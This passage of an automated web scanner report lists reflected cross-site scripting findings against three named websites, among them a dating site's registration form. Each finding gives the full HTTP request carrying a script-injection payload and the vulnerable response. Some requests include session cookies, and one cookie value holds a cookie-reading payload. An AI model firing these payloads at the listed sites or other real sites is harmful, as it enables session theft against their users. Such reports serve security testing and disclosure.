Via: NS-CACHE: 100
Etag: "9132285711f22c48b2e96cbecb65472c685386d9"
Content-Length: 213
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sun, 24 Apr 2011 04:16:46 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/2011/04/23/dork/nextadvisorcom/reflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.htmle685f<script>alert(1)</script>8d158132c29", "diggs": 0});

6.264. http://www.actividentity.com/inc/securimage/securimage_play.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /inc/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5c69f<script>alert(1)</script>cf590911e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /inc5c69f<script>alert(1)</script>cf590911e53/securimage/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
Referer: http://www.actividentity.com/device_identification_for_user_authentication?gclid=CNnXlJP1tagCFQ5-5Qodm1pYEg
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303674298.1; __utmc=262184092; __utmb=262184092.1.10.1303674298

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:56:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98

Bad file./var/www/html/inc5c69f<script>alert(1)</script>cf590911e53/securimage/securimage_play.swf

6.265. http://www.actividentity.com/inc/securimage/securimage_play.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /inc/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 81870<script>alert(1)</script>dc8ab65152 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /inc/securimage81870<script>alert(1)</script>dc8ab65152/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
Referer: http://www.actividentity.com/device_identification_for_user_authentication?gclid=CNnXlJP1tagCFQ5-5Qodm1pYEg
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303674298.1; __utmc=262184092; __utmb=262184092.1.10.1303674298

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:56:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97

Bad file./var/www/html/inc/securimage81870<script>alert(1)</script>dc8ab65152/securimage_play.swf

6.266. http://www.actividentity.com/inc/securimage/securimage_play.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /inc/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 16f03<script>alert(1)</script>95f325e6671 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /inc/securimage/securimage_play.swf16f03<script>alert(1)</script>95f325e6671?audio=/inc/securimage/securimage_play.phpx&bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
Referer: http://www.actividentity.com/device_identification_for_user_authentication?gclid=CNnXlJP1tagCFQ5-5Qodm1pYEg
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303674298.1; __utmc=262184092; __utmb=262184092.1.10.1303674298

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:56:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98

Bad file./var/www/html/inc/securimage/securimage_play.swf16f03<script>alert(1)</script>95f325e6671

6.267. http://www.actividentity.com/inc/securimage/securimage_show.phpx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /inc/securimage/securimage_show.phpx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c19a8<script>alert(1)</script>eb5f4ee41e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /incc19a8<script>alert(1)</script>eb5f4ee41e5/securimage/securimage_show.phpx?0.8087636675534109 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.actividentity.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:26:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99

Bad file./var/www/html/incc19a8<script>alert(1)</script>eb5f4ee41e5/securimage/securimage_show.phpx

6.268. http://www.actividentity.com/inc/securimage/securimage_show.phpx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /inc/securimage/securimage_show.phpx

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8a38b<script>alert(1)</script>1435e2cdeba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /inc/securimage8a38b<script>alert(1)</script>1435e2cdeba/securimage_show.phpx?0.8087636675534109 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.actividentity.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:26:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99

Bad file./var/www/html/inc/securimage8a38b<script>alert(1)</script>1435e2cdeba/securimage_show.phpx

6.269. http://www.actividentity.com/inc/securimage/securimage_show.phpx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /inc/securimage/securimage_show.phpx

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 956d5<script>alert(1)</script>5c43c809081 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /inc/securimage/securimage_show.phpx956d5<script>alert(1)</script>5c43c809081?0.8087636675534109 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.actividentity.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:26:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99

Bad file./var/www/html/inc/securimage/securimage_show.phpx956d5<script>alert(1)</script>5c43c809081

6.270. http://www.dictof.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe6d1<script>alert(1)</script>99e6fce44cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icofe6d1<script>alert(1)</script>99e6fce44cd HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FC101987E2340D1CA7E9F5BBE7019BA1.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; CAMPAIGNE.ENTRY_DATE_COOKIE=1303648014948; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=121015709.328301938.1303648022.1303648022.1303648022.1; __utmc=121015709; __utmb=121015709.1.10.1303648022; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=262432266.188043035.1303648022.1303648022.1303648022.1; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.2.10.1303648022

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 24 Apr 2011 12:45:23 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: lc=en; Path=/
Content-Language: en
Content-Length: 3651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
<p>The page - /favicon.icofe6d1<script>alert(1)</script>99e6fce44cd - does not exist.</p>
...[SNIP]...

6.271. http://www.dictof.com/registration/ [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /registration/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40add"><script>alert(1)</script>6efe60afc7cd4777a was submitted in the email parameter. This input was echoed as 40add\"><script>alert(1)</script>6efe60afc7cd4777a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /registration/?refererNickname=&sexId=0&birthDayPerson1=0&birthMonthPerson1=0&birthYearPerson1=0&lookingForSexId=0&criteria%5B15%5D=0&criteria%5B41%5D=0&screenname=&newPassword=&email=40add"><script>alert(1)</script>6efe60afc7cd4777a&countryId=204&regionId=0&postalCode=&postalCodeLookupMode=false&agree=true HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/registration/
Cache-Control: max-age=0
Origin: http://www.dictof.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; JSESSIONID=503A9BE5C7A58443B7733BAF9AD970FD.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fwww.dictof.com%2Ffavicon.icofe6d1%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E99e6fce44cd; CAMPAIGNE.ENTRY_DATE_COOKIE=1303661135545; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utma=121015709.328301938.1303648022.1303648022.1303661140.2; __utmc=121015709; __utmb=121015709.3.10.1303661140; __utma=262432266.188043035.1303648022.1303648022.1303661140.2; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.6.10.1303661140

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:06:37 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: en
Content-Length: 46398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
<input title="Your activation link will be sent to this account, please use valid e-mail in this field." name="email" type="text" id="email" value="40add\"><script>alert(1)</script>6efe60afc7cd4777a" />
...[SNIP]...

6.272. http://www.dictof.com/registration/ [newPassword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /registration/

Issue detail

The value of the newPassword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b951f"><script>alert(1)</script>39e4ffccbb957c34b was submitted in the newPassword parameter. This input was echoed as b951f\"><script>alert(1)</script>39e4ffccbb957c34b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /registration/?refererNickname=&sexId=0&birthDayPerson1=0&birthMonthPerson1=0&birthYearPerson1=0&lookingForSexId=0&criteria%5B15%5D=0&criteria%5B41%5D=0&screenname=&newPassword=b951f"><script>alert(1)</script>39e4ffccbb957c34b&email=&countryId=204&regionId=0&postalCode=&postalCodeLookupMode=false&agree=true HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/registration/
Cache-Control: max-age=0
Origin: http://www.dictof.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; JSESSIONID=503A9BE5C7A58443B7733BAF9AD970FD.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fwww.dictof.com%2Ffavicon.icofe6d1%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E99e6fce44cd; CAMPAIGNE.ENTRY_DATE_COOKIE=1303661135545; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utma=121015709.328301938.1303648022.1303648022.1303661140.2; __utmc=121015709; __utmb=121015709.3.10.1303661140; __utma=262432266.188043035.1303648022.1303648022.1303661140.2; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.6.10.1303661140

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:06:36 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: en
Content-Length: 46552

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
<input name="newPassword" type="text" id="newPassword" value="b951f\"><script>alert(1)</script>39e4ffccbb957c34b" maxlength="20" title="Password should be from 6 to 20 characters long and contain latin letters and numbers"/>
...[SNIP]...

6.273. http://www.dictof.com/registration/ [postalCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /registration/

Issue detail

The value of the postalCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93cb3"><script>alert(1)</script>fb9fca107ca6ddee6 was submitted in the postalCode parameter. This input was echoed as 93cb3\"><script>alert(1)</script>fb9fca107ca6ddee6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /registration/?refererNickname=&sexId=0&birthDayPerson1=0&birthMonthPerson1=0&birthYearPerson1=0&lookingForSexId=0&criteria%5B15%5D=0&criteria%5B41%5D=0&screenname=&newPassword=&email=&countryId=204&regionId=0&postalCode=93cb3"><script>alert(1)</script>fb9fca107ca6ddee6&postalCodeLookupMode=false&agree=true HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/registration/
Cache-Control: max-age=0
Origin: http://www.dictof.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; JSESSIONID=503A9BE5C7A58443B7733BAF9AD970FD.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fwww.dictof.com%2Ffavicon.icofe6d1%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E99e6fce44cd; CAMPAIGNE.ENTRY_DATE_COOKIE=1303661135545; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utma=121015709.328301938.1303648022.1303648022.1303661140.2; __utmc=121015709; __utmb=121015709.3.10.1303661140; __utma=262432266.188043035.1303648022.1303648022.1303661140.2; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.6.10.1303661140

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:06:38 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: en
Content-Length: 46254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
<input name="postalCode" type="text" id="postalCode" value="93CB3\"><SCRIPT>ALERT(1)</SCRIPT>FB9FCA107CA6DDEE6" />
...[SNIP]...

6.274. http://www.dictof.com/registration/ [refererNickname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /registration/

Issue detail

The value of the refererNickname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b79eb"><script>alert(1)</script>d4d050447934e5223 was submitted in the refererNickname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /registration/?refererNickname=b79eb"><script>alert(1)</script>d4d050447934e5223&sexId=0&birthDayPerson1=0&birthMonthPerson1=0&birthYearPerson1=0&lookingForSexId=0&criteria%5B15%5D=0&criteria%5B41%5D=0&screenname=&newPassword=&email=&countryId=204&regionId=0&postalCode=&postalCodeLookupMode=false&agree=true HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/registration/
Cache-Control: max-age=0
Origin: http://www.dictof.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; JSESSIONID=503A9BE5C7A58443B7733BAF9AD970FD.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fwww.dictof.com%2Ffavicon.icofe6d1%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E99e6fce44cd; CAMPAIGNE.ENTRY_DATE_COOKIE=1303661135545; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utma=121015709.328301938.1303648022.1303648022.1303661140.2; __utmc=121015709; __utmb=121015709.3.10.1303661140; __utma=262432266.188043035.1303648022.1303648022.1303661140.2; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.6.10.1303661140

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:06:34 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: en
Content-Length: 46491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
<input type="hidden" id="refererNickname" name="refererNickname" value="b79eb"><script>alert(1)</script>d4d050447934e5223"/>
...[SNIP]...

6.275. http://www.dictof.com/registration/ [screenname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dictof.com
Path:   /registration/

Issue detail

The value of the screenname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68930"><script>alert(1)</script>791048e69bd3fa841 was submitted in the screenname parameter. This input was echoed as 68930\"><script>alert(1)</script>791048e69bd3fa841 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /registration/?refererNickname=&sexId=0&birthDayPerson1=0&birthMonthPerson1=0&birthYearPerson1=0&lookingForSexId=0&criteria%5B15%5D=0&criteria%5B41%5D=0&screenname=68930"><script>alert(1)</script>791048e69bd3fa841&newPassword=&email=&countryId=204&regionId=0&postalCode=&postalCodeLookupMode=false&agree=true HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/registration/
Cache-Control: max-age=0
Origin: http://www.dictof.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; JSESSIONID=503A9BE5C7A58443B7733BAF9AD970FD.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fwww.dictof.com%2Ffavicon.icofe6d1%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E99e6fce44cd; CAMPAIGNE.ENTRY_DATE_COOKIE=1303661135545; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utma=121015709.328301938.1303648022.1303648022.1303661140.2; __utmc=121015709; __utmb=121015709.3.10.1303661140; __utma=262432266.188043035.1303648022.1303648022.1303661140.2; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.6.10.1303661140

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:06:35 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: en
Content-Length: 46527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
<input name="screenname" type="text" id="screenname" value="68930\"><script>alert(1)</script>791048e69bd3fa841" maxlength="20" title="Screenname should be up to 20 characters long"/>
...[SNIP]...

6.276. http://www.fightidentitytheft.com/credit-monitoring.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /credit-monitoring.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89fd3"><script>alert(1)</script>1735da0f233 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /credit-monitoring.html89fd3"><script>alert(1)</script>1735da0f233 HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:47:14 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=fea538f7ebf7a7b0e3108066d5d9cee3; expires=Tue, 17-May-2011 23:20:34 GMT; path=/; domain=.fightidentitytheft.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:47:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

